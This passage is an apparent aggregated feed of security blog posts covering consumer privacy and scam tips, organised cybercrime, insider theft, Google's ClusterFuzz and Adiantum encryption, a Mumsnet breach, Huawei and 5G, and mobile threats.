  • Use a screen name for social media accounts. If you don’t want a simple search of your name on Google to lead to all your social media accounts, consider using a different variation of your real name.
  • Watch what you post. Before tagging your friends or location on Instagram and posting your location on Facebook, think about what this private information reveals about you publicly and how it could be used by a third-party.
  • Use strong passwords. In the chance your data does become exposed, or your device is stolen, a strong, unique password can help prevent your accounts from being hacked.
  • Leverage two-factor authentication. Remember to always implement two-factor authentication to add an extra layer of security to your device. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.
  • Use the cloud with caution. If you plan to store your data in the cloud, be sure to set up an additional layer of access security (one way of doing this is through two-factor authentication) so that no one can access the wealth of information your cloud holds. If your smartphone is lost or stolen, you can access your password protected cloud account to lock third-parties out of your device, and more importantly your personal data.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You? appeared first on McAfee Blogs.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

IoT Vulnerabilities on the Rise
According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.Online Dating Scams

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.Online Dating Scams

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

How Online Gamers Can Play It Safe

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion dollars in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk.

From malware and phishing scams, to phony game hacks, identity theft, and more, gamers of all stripes now face a minefield of obstacles online and in real life. So, if you’re going to play games, it’s best to play it safe.

Here’s what to look out for:

Dodgy Downloads

Gamers who play on their computer or mobile device need to watch out for dangerous links or malicious apps disguised as popular or “free” games. Hackers often use innocent-looking downloads to deliver viruses and spyware, or even sign you up for paid services, without your consent. In one prominent case, more than 2.6 million Android users downloaded fake Minecraft apps that allowed hackers to take control of their devices.

Researchers have even discovered a ransomware threat that targets gamers. TeslaCrypt was designed to encrypt game-play data until a ransom is paid. Originally distributed through a malicious website, it has since been circulating via spam.

And while it’s true that game consoles like PlayStation and Xbox aren’t as vulnerable to viruses, since they are closed systems, that doesn’t mean that their users don’t face other risks.

Social Scams

Players on any platform could wind up with malware, sent directly from other players via chat messages. Some scammers use social engineering tricks, like inviting other players to download “helpful” tools that turn out to be malware instead. When you consider that 62% of kids play games where they speak to others, the odds of a risky interaction with a stranger seems quite real.

Players of the Origin and Steam services, for instance, were targeted by hackers posing as other players, inviting them to play on their teams. Over chat message, they suggested the players download an “audio tool” that turned out to be a keystroke logger, aimed at stealing their access credentials for the game.

Other social scams include malicious YouTube videos or websites, offering game bonuses and currency, for free.

Another widespread social threat is account takeover, or ATO for short. This is when a scammer hacks a real account in order to post spammy links, and scam messages that appear to come from a trusted contact. Some accounts, for games like League of Legends, have even been stolen and sold online for money because they boasted a high level, or rare skins.

Phishing

Finally, be on the lookout for phishing websites, offering free games or bonuses, or phishy emails prompting you to login to your account, with a link leading to a copycat gaming site. Often, these are designed to steal your login credentials or distribute fake games that contain malware.

Players of the wildly popular Fortnite, for example, have been particularly targeted. The latest phishing scam is aimed at stealing the third-party sign-in tokens that allow cybercriminals to access a user’s account, and the payment details associated with it.

So now that you know about a little more about gaming threats, here’s how to win at playing it safe:

  1. Do Your Research—Before downloading any games from the Internet or app stores, make sure to read other users’ reviews first to see that they are safe. This also goes for sites that sell game hacks, credits, patches, or virtual assets typically used to gain rank within a game. Avoid illegal file-sharing sites and “free” downloads, since these are often peppered with malware. It’s always best to go for a safer, paid option from a reputable source.
  2. Play Undercover— Be very careful about sharing personal information, in both your profile information, and your chat messages. Private information, such as your full name, address, pet’s name, school, or work details, could be used to guess your account password clues, or even impersonate you. Consider playing under an alias.
  3. Be Suspicious—Since scammers use the social aspect of games to fool people, you need to keep your guard up when you receive messages from strangers, or even read reviews.
    Some YouTube and social media reviews are placed there to trick users into thinking that the game or asset is legitimate. Dig deep, and avoid looking for free hacks. Ask gamers you know in real life for recommendations that worked for them.
  4. Protect Yourself—Avoid using older versions of games, and make sure that games you do play are updated with patches and fixes. And if you think a gaming account may already have been compromised, change your passwords immediately to something unique and complex.Safeguard your computers and devices from known and emerging threats by investing in comprehensive security software, and keep yourself up-to-date on the latest scams.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

[1]According to The 2017 Year In Review Report by SuperData

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

Open sourcing ClusterFuzz



[Cross-posted from the Google Open-Source Blog]

Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications. Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability.

In order for fuzzing to be truly effective, it must be continuous, done at scale, and integrated into the development process of a software project. To provide these features for Chrome, we wrote ClusterFuzz, a fuzzing infrastructure running on over 25,000 cores. Two years ago, we began offering ClusterFuzz as a free service to open source projects through OSS-Fuzz.

Today, we’re announcing that ClusterFuzz is now open source and available for anyone to use.
We developed ClusterFuzz over eight years to fit seamlessly into developer workflows, and to make it dead simple to find bugs and get them fixed. ClusterFuzz provides end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports.

ClusterFuzz has found more than 16,000 bugs in Chrome and more than 11,000 bugs in over 160 open source projects integrated with OSS-Fuzz. It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day.

Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions. In production, ClusterFuzz depends on some key Google Cloud Platform services, but you can use your own compute cluster. We welcome your contributions and look forward to any suggestions to help improve and extend this infrastructure. Through open sourcing ClusterFuzz, we hope to encourage all software developers to integrate fuzzing into their workflows.

Get TotalAV Essential AntiVirus for $19.99 (80% off)

The term “computer virus” calls to mind imagery of pathogenic creepy-crawlies bringing down a device’s operating system, their flagella wriggling as they multiply into hordes that infiltrate its chips and wires. And while it’s true that our computers can be infected with literal biological bacteria like staphylococci, per Science Illustrated, the threat of malicious codes and programs intent on corrupting data and files looms far larger: According to a recent study from the University of Maryland’s Clark School of Engineering, attacks on computers with internet access is virtually ceaseless, with an incident occurring every 39 seconds on average, affecting a third of Americans every year.

To read this article in full, please click here

Introducing Adiantum: Encryption for the Next Billion Users



Storage encryption protects your data if your phone falls into someone else's hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.
Today, Android offers storage encryption using the Advanced Encryption Standard (AES). Most new Android devices have hardware support for AES via the ARMv8 Cryptography Extensions. However, Android runs on a wide range of devices. This includes not just the latest flagship and mid-range phones, but also entry-level Android Go phones sold primarily in developing countries, along with smart watches and TVs. In order to offer low cost options, device manufacturers sometimes use low-end processors such as the ARM Cortex-A7, which does not have hardware support for AES. On these devices, AES is so slow that it would result in a poor user experience; apps would take much longer to launch, and the device would generally feel much slower. So while storage encryption has been required for most devices since Android 6.0 in 2015, devices with poor AES performance (50 MiB/s and below) are exempt. We've been working to change this because we believe that encryption is for everyone.
In HTTPS encryption, this is a solved problem. The ChaCha20 stream cipher is much faster than AES when hardware acceleration is unavailable, while also being extremely secure. It is fast because it exclusively relies on operations that all CPUs natively support: additions, rotations, and XORs. For this reason, in 2014 Google selected ChaCha20 along with the Poly1305 authenticator, which is also fast in software, for a new TLS cipher suite to secure HTTPS internet connections. ChaCha20-Poly1305 has been standardized as RFC7539, and it greatly improves HTTPS performance on devices that lack AES instructions.
However, disk and file encryption present a special challenge. Data on storage devices is organized into "sectors" which today are typically 4096 bytes. When the filesystem makes a request to the device to read or write a sector, the encryption layer intercepts that request and converts between plaintext and ciphertext. This means that we must convert between a 4096-byte plaintext and a 4096-byte ciphertext. But to use RFC7539, the ciphertext must be slightly larger than the plaintext; a little space is needed for the cryptographic nonce and message integrity information. There are software techniques for finding places to store this extra information, but they reduce efficiency and can impose significant complexity on filesystem design.
Where AES is used, the conventional solution for disk encryption is to use the XTS or CBC-ESSIV modes of operation, which are length-preserving. Currently Android supports AES-128-CBC-ESSIV for full-disk encryption and AES-256-XTS for file-based encryption. However, when AES performance is insufficient there is no widely accepted alternative that has sufficient performance on lower-end ARM processors.
To solve this problem, we have designed a new encryption mode called Adiantum. Adiantum allows us to use the ChaCha stream cipher in a length-preserving mode, by adapting ideas from AES-based proposals for length-preserving encryption such as HCTR and HCH. On ARM Cortex-A7, Adiantum encryption and decryption on 4096-byte sectors is about 10.6 cycles per byte, around 5x faster than AES-256-XTS.
Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa. It works by first hashing almost the entire plaintext using a keyed hash based on Poly1305 and another very fast keyed hashing function called NH. We also hash a value called the "tweak" which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction. This is arranged in a configuration known as a Feistel network, so that we can decrypt what we've encrypted. A single AES-256 invocation on a 16-byte block is also required, but for 4096-byte inputs this part is not performance-critical.
Cryptographic primitives like ChaCha are organized in "rounds", with each round increasing our confidence in security at a cost in speed. To make disk encryption fast enough on the widest range of devices, we've opted to use the 12-round variant of ChaCha rather than the more widely used 20-round variant. Each round vastly increases the difficulty of attack; the 7-round variant was broken in 2008, and though many papers have improved on this attack, no attack on 8 rounds is known today. This ratio of rounds used to rounds broken today is actually better for ChaCha12 than it is for AES-256.
Even though Adiantum is very new, we are in a position to have high confidence in its security. In our paper, we prove that it has good security properties, under the assumption that ChaCha12 and AES-256 are secure. This is standard practice in cryptography; from "primitives" like ChaCha and AES, we build "constructions" like XTS, GCM, or Adiantum. Very often we can offer strong arguments but not a proof that the primitives are secure, while we can prove that if the primitives are secure, the constructions we build from them are too. We don't have to make assumptions about NH or the Poly1305 hash function; these are proven to have the cryptographic property ("ε-almost-∆-universality") we rely on.
Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion.

Additional resources

The full details of our design, and the proof of security, are in our paper Adiantum: length-preserving encryption for entry-level processors in IACR Transactions on Symmetric Cryptology; this will be presented at the Fast Software Encryption conference (FSE 2019) in March.
Generic and ARM-optimized implementations of Adiantum are available in the Android common kernels v4.9 and higher, and in the mainline Linux kernel v5.0 and higher. Reference code, test vectors, and a benchmarking suite are available at https://github.com/google/adiantum.
Android device manufacturers can enable Adiantum for either full-disk or file-based encryption on devices with AES performance <= 50 MiB/sec and launching with Android Pie. Where hardware support for AES exists, AES is faster than Adiantum; AES must still be used where its performance is above 50 MiB/s. In Android Q, Adiantum will be part of the Android platform, and we intend to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Acknowledgements: This post leveraged contributions from Greg Kaiser and Luke Haviland. Adiantum was designed by Paul Crowley and Eric Biggers, implemented in Android by Eric Biggers and Greg Kaiser, and named by Danielle Roberts.

Mumsnet reports itself to regulator over data breach

Company apologises after bug meant users were able to log into accounts of strangers

Mumsnet has reported itself to the information commissioner after a data breach resulted in users accidentally logging into the accounts of strangers.

Related: Mumsnet forums are a guilty pleasure, but there are truths, too

Related: Mumsnet brings in tougher forum rules after transgender row

Continue reading...

Are you missing out on the AppSec conversation that will benefit your program?

There are a growing number of application security-related conversations – conversations around paralyzing breaches, increasing regulations, and risky open source code. Many of these conversations occur in small groups, resulting in action items for stakeholders who are often not involved in the conversation. How can those conversations include the voices of all the different stakeholders of application security – those who are accountable and impacted?

The 9th annual State of Community Management (SOCM) report released in 2018 by The Community Roundtable confirmed that communities are change agents for dispersing knowledge, sharing information, and, most importantly, enabling conversations across organizations, among peers, and with subject-matter-experts. One significant recommendation of that research was for communities to play a greater role in functions where sharing of information is critical. As I begin responding to the 2019 SOCM survey, I see how each stakeholder within our customer base has begun to participate in the application security conversation, and I see how these conversations can directly influence the speed at which organizations secure their software.

Online tutorials, technical support, and customer success teams (Security Program Managers at Veracode!) provide excellent guidance on resolving challenges and building execution strategies. However, those conversations specifically help you, help your organization, and help your strategy. The Veracode Community is a valuable part of this resource mix and includes your peers in those conversations – your peers who have experienced similar challenges, countless failures, and found their best practice. That best practice could be your best practice. These conversations can begin with a “how do I” question, a “why is this happening” question, or “who else has experienced this” question. We have an opportunity to build a global conversation on application security and each step toward secure software.

Perhaps as the security practitioner in your organization, the conversation is understanding how best to structure your program.

As the developer or manager of a development team, it’s understanding the impact to your software development process, ways to minimize that impact, and ways to get ahead of the flaws found in the code.

As a product manager, it’s understanding the value of adding this extra step – application security – in getting your product to market.

As a marketing executive, it’s understanding the value of including the security of your product in your company message.

As the company executive, it’s understanding the value of the investment in application security.

In what part of the application security conversation will you participate?

The Veracode Community enables these conversations, captures our customers’ ideas to drive product advancement, and supports your application security needs. Click here to see the features of the Veracode Community that will springboard your participation in the application security conversation that will support your efforts.

Is Huawei a Threat to UK National Security?

On 19th July 2018 the UK government, through the GCHQ backed Huawei Cyber Security Evaluation Centre, gave “limited assurance” that Huawei poses no threat to UK National Security. Since then the UK, EU, and NATO member government politicians and security services have all raised concerns about the nation-state cyber threat posed by the Chinese telecoms giant Huawei. 

There has been particular political unease around the Huawei provision of network infrastructure devices (i.e. switches and routers etc.) within the UK national infrastructure, devices which controls network traffic and capable of accessing the data that traverses them. Huawei has been operating in the UK market for 18 years, whether its their smart phones or a network devices, Huawei products are generally far cheaper than their competitors' equivalents. This has led to major telecoms providers such as BT, purchasing and implementing Huawei network devices within their telecommunications infrastructure and data centres, some of which are regarded as critical components within the UK national infrastructure. As such, Huawei has been subject to unfavourable security scrutiny, which has recently spilt out into political and media arenas. 


Huawei has always denied its products poses a threat, and there is no evidence of any malicious capability or activity publicly disclosure by any UK intelligence agencies or cyber security firms. But there is also the Chinese 2017 National Intelligence Law, which states that Chinese organisations are obliged to "support, cooperate with, and collaborate in, national intelligence work".

Three nations in the intelligence alliance ‘Five Eyes’, the United States, Australia, and New Zealand, have effectively prohibited the installation of Huawei equipment within their generation telecommunications equipment, namely 5G networks. The remaining two members of "Five Eyes", the United Kingdom and Canada, are expected to state their position within the coming months. The UK's National Cyber Security Centre has published warnings about the Chinese company's security standards. Elsewhere, nations including France, Germany and India have expressed their concerns about the use of Huawei equipment within their telecommunications 5G upgrades.


On 4th February, a leaked draft 'Huawei Cyber Security Evaluation Centre' 2019 report, said the issues and findings it had raised previously had not been fully addressed by Huawei, and was critical about the security of Huawei's technology.

Then on 6th February 2019,  a letter sent to MPs by Huawei was published. In it Huawei said it could take up to five years to address security issues raised by the Huawei Cyber Security Evaluation Centre, at a cost of $2bn (£1.5bn) of their own money. The president of Huawei's carrier business group also said the process of adapting its software and engineering processes to meet the UK's requirements was "like replacing components on a high-speed train in motion".

Huawei also made the following points in the letter to rebut the threat allegations,  "Huawei is a closely watched company.  Were Huawei ever to engage in malicious behaviour, it would not go unnoticed - and it would certainly destroy our business. For us, it is a matter of security or nothing; there is no third option. We choose to ensure security." The letter also addressed the Chinese 2017 National Intelligence Law, stating "no Chinese law obliges any company to install backdoors", a position they have backed up by an international law firm based in London. The letter went on to say that Huawei would refuse requests by the Chinese government to plant backdoors, eavesdropping or spyware on its telecommunications equipment.

The ball is now in the UK government's court, in the next couple of months we shall see if the UK Gov bans Huawei or continues to work with them to help assure the implied national security threat of their products. A ban could well result in Huawei pulling out of the UK market altogether, taking their billions of pounds of investment with them, and would likely negatively impact post Brexit trade deal negotiations between the UK and China, so we can expect the situation to become even more political in the short term.

Huawei Threat News Timeline
Who are Huawei?
  • Chinese multinational conglomerate which specialises in telecommunications equipment, consumer electronics and technology-based services and products.
  • HQ in Shenzhen, Guangdong
  • Founded in 1987 by Ren Zhengfei, a former engineer in the People's Liberation Army
  • Largest telecommunications-equipment manufacturer in the world
  • Overtook from Apple in 2018 as the second-largest manufacturer of smartphones in the world
  • 72nd on the Fortune Global 500 list
  • 180,000 employees
  • Chinese military remain an important customer for Huawei
  • Invests Billions into R&D around world
  • 3 Billions Customers Globally
  • Operating within the UK for 18 years
  • Made a five year commitment (2018 to 2023) to invest £3 billion in the UK.
  • Allegations its equipment may contain backdoors to allow unauthorised surveillance and/or data theft by the Chinese government and the People’s Liberation Army
The 5G Evolution
5G is expected emerge in the UK in late 2019 and early 2020, and will be much faster than 4G. The theoretical maximum speed for 4G is 1Gbps, while the theoretical maximum speed for 5G is 20Gbps, so 5G is potentially up to 20 times faster than 4G. Potentially faster than the UK average broadband speed, which stands at 18.57Gbps.

Mobile networks are changing with the arrival of 5G and the impact of this change will be felt across the industry. Adrian Taylor, regional VP of sales for A10 Networks, provides the follow insight about the impact of 5G on the market and how it will change the enterprise world.

5G and the Evolution of Mobile Networks
Fifth generation networks, just like the preceding 4G LTE and WiMAX networks, are expected to greatly increase available bandwidth, with improved end-to-end performance providing a better end-user experience. In the most basic of terms, 4G LTE was the long-term evolution of Radio Access Networks (RAN); 5G is the next iteration.

Wireless carriers have invested billions into their networks to support the ongoing demand for faster network speeds. They must look for ways to increase revenue while delivering more value to the end user. This continues to drive new devices into the hands of the consumer. The demand for increased efficiencies, bandwidth, and coverage has pushed carriers towards a decentralised deployment model.

Network Virtualisation Remains in The Early Stages
Service providers monitor and review technology for advancements that will help deliver faster and less expensive networks. Recently, they have looked into areas of Network Function Virtualisation (NFV) and automation to support their advancements. Mobile network operators are investing heavily in reducing delays and errors through repetitive processes as they build and add capacity to existing 4G networks.

Virtualisation and Software Defined Networks (SDN) improvements are driving a shift from hardware to software. SDN is promising, but it’s not an instant solution, as purpose-built hardware still remains the preferred choice. NFV and SDN have offered service providers an alternative to existing methods, including dedicated appliances sitting idle. However, it’s safe to say that the age of virtualisation remains in the early stages.


Hardware manufacturers and service providers are now betting on the acceptance and success of virtualised functions. Software development continues at breakneck speed to meet timelines and demands for more integrated solutions, which easily scale and reduce operational overheads at the same time.

The 5G Revenue Opportunity
5G’s impact is expected to extend beyond the typical mobile network carriers/operators such as Virgin Media, EE, O2, and Sky in the UK and overseas. It promises to enable increased connectivity and flexibility, that will drive additional functions throughout all supportive components of a mobile carrier’s network.

RAN access providers face the question of how to support the ever-increasing appetite for cutting the cord. How can we use our mobile devices in more ways than previously thought, as the end user goes about their daily tasks? This mobility, whether it’s tied to a carrier’s technology or even a simple Wi-Fi home network, reaches all corners of our day-to-day life.

This reach extends from the cloud to the data centre environments and continues to drive capacity needs, supported by both legacy appliances and the ever-increasing virtual environments. This continued appetite for consumption has opened up opportunities for all facets of technology and associated vendors.

5G Mobile Network Evolution
The continued expansion of 5G networks will have a revolutionary impact upon every mobile subscriber and business in the world.

The fundamental market forces of network evolution are not based on wired or wireless infrastructure. Companies are currently focused on upgrading existing mobile networks. Whereas at the exact same time, NFV, SDN and the global IoT industry are all preparing to utilise the next generation of mobile networks.

Software solutions are easier to move from concept to production and frequently offer a lower up-front investment cost. This all adds up to help drive increased functionality for all service providers, including the wired infrastructure.

5G and IoT will be demand-driven. As a result, the more the infrastructure expands to meet that demand, the more opportunities will be uncovered. It’s a positive feedback loop that will revolutionise how we think of the internet.

Get ready for a world that will be changed forever with the next generation mobile networks on the horizon.

      Your Mobile Phone: Friend or Foe?

      Where would we be without our mobile phones?  Our kids, boss, friends – so many people reach out to us via our mobile phone.  And unfortunately, hackers have also started reaching out – in major ways. The severity of attacks on mobile devices is often underestimated. It is now common to have employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, giving cybercriminals the opportunity to access sensitive information if and when they hack into an employee’s phone. Let’s take a closer look at some of the common mobile threats that put your business at risk and how to prevent them.

      App-Based Threats

      Although new mobile malware declined by 24% in Q3 2018, per our latest Quarterly Threats Report, app-based threats still dominate the threat landscape. Malicious actors use social engineering techniques by asking users to update their applications by uninstalling the real app and re-installing a malicious one. With one click, malware can be installed on your mobile device.

      Many app-based threats can evolve into more insidious attacks and can go beyond exploiting your personal information. An attacker’s initial goal is to get access and all they need is one vulnerable employee to fall victim to an app-based threat. Once the attacker gains access to an employee’s personally identifiable information (PII) or credentials, they can hijack accounts, impersonate the employee, and trick other employees into divulging even more sensitive corporate data.

      Late last year, the McAfee Mobile Research team discovered an active phishing campaign that uses text messages (SMS) to trick users into downloading and installing a fake voice-message app. The app allowed cybercriminals to use infected devices as network proxies without the users’ knowledge.

      This year, we expect to see an increase in underground discussions on mobile malware—mostly focused on Android—regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security.

      Risky Wi-Fi Networks

